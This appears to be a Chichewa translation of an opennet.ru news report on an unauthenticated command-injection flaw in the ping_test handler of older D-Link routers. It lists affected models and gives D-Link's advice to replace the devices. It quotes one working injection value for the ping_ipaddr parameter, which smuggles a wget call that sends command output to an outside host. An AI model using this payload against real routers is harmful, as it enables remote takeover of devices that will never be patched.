Mu ma routers opanda zingwe a D-Link chiwopsezo chowopsa (), zomwe zimakulolani kuti mupereke code patali kumbali ya chipangizocho potumiza pempho lapadera kwa "ping_test" chothandizira, chopezeka popanda kutsimikiziridwa.
Chosangalatsa ndichakuti, molingana ndi opanga ma firmware, kuyimba kwa "ping_test" kuyenera kuchitidwa pokhapokha kutsimikizika, koma kwenikweni kumatchedwa mulimonse, mosasamala kanthu za kulowa mu intaneti. Makamaka, mukalowa pa apply_sec.cgi script ndikudutsa "action=ping_test" parameter, script imabwereranso ku tsamba lovomerezeka, koma nthawi yomweyo imachita zomwe zikugwirizana ndi ping_test. Kuti apereke codeyo, chiwopsezo china chinagwiritsidwa ntchito pa ping_test yokha, yomwe imayitanitsa ping utility popanda kuyang'ana bwino kulondola kwa adilesi ya IP yomwe idaperekedwa kuti iyesedwe. Mwachitsanzo, kuyitanitsa wget utility ndikusamutsa zotsatira za lamulo la "echo 1234" kwa munthu wakunja, ingotchulani gawo "ping_ipaddr=127.0.0.1%0awget%20-P%20/tmp/%20http:// test.test/?$( echo 1234)".
Kupezeka kwachiwopsezo kwatsimikiziridwa mwalamulo mumitundu iyi:
- DIR-655 yokhala ndi firmware 3.02b05 kapena kupitilira apo;
- DIR-866L yokhala ndi firmware 1.03b04 kapena kupitilira apo;
- DIR-1565 yokhala ndi firmware 1.01 kapena kupitilira apo;
- DIR-652 (palibe zambiri zamitundu yovuta ya firmware yomwe yaperekedwa)
Nthawi yothandizira mitunduyi yatha kale, kotero D-Link , zomwe sizingatulutse zosintha kwa iwo kuti zithetse chiwopsezocho, sizimalangiza kugwiritsa ntchito ndikulangiza m'malo mwa zida zatsopano. Monga njira yachitetezo, mutha kuchepetsa mwayi wopezeka pa intaneti kukhala ma adilesi odalirika a IP okha.
Pambuyo pake zidadziwika kuti kusatetezeka kunalinso mitundu ya DIR-855L, DAP-1533, DIR-862L, DIR-615, DIR-835 ndi DIR-825, ikukonzekera kutulutsa zosintha zomwe sizikudziwika.
Source: opennet.ru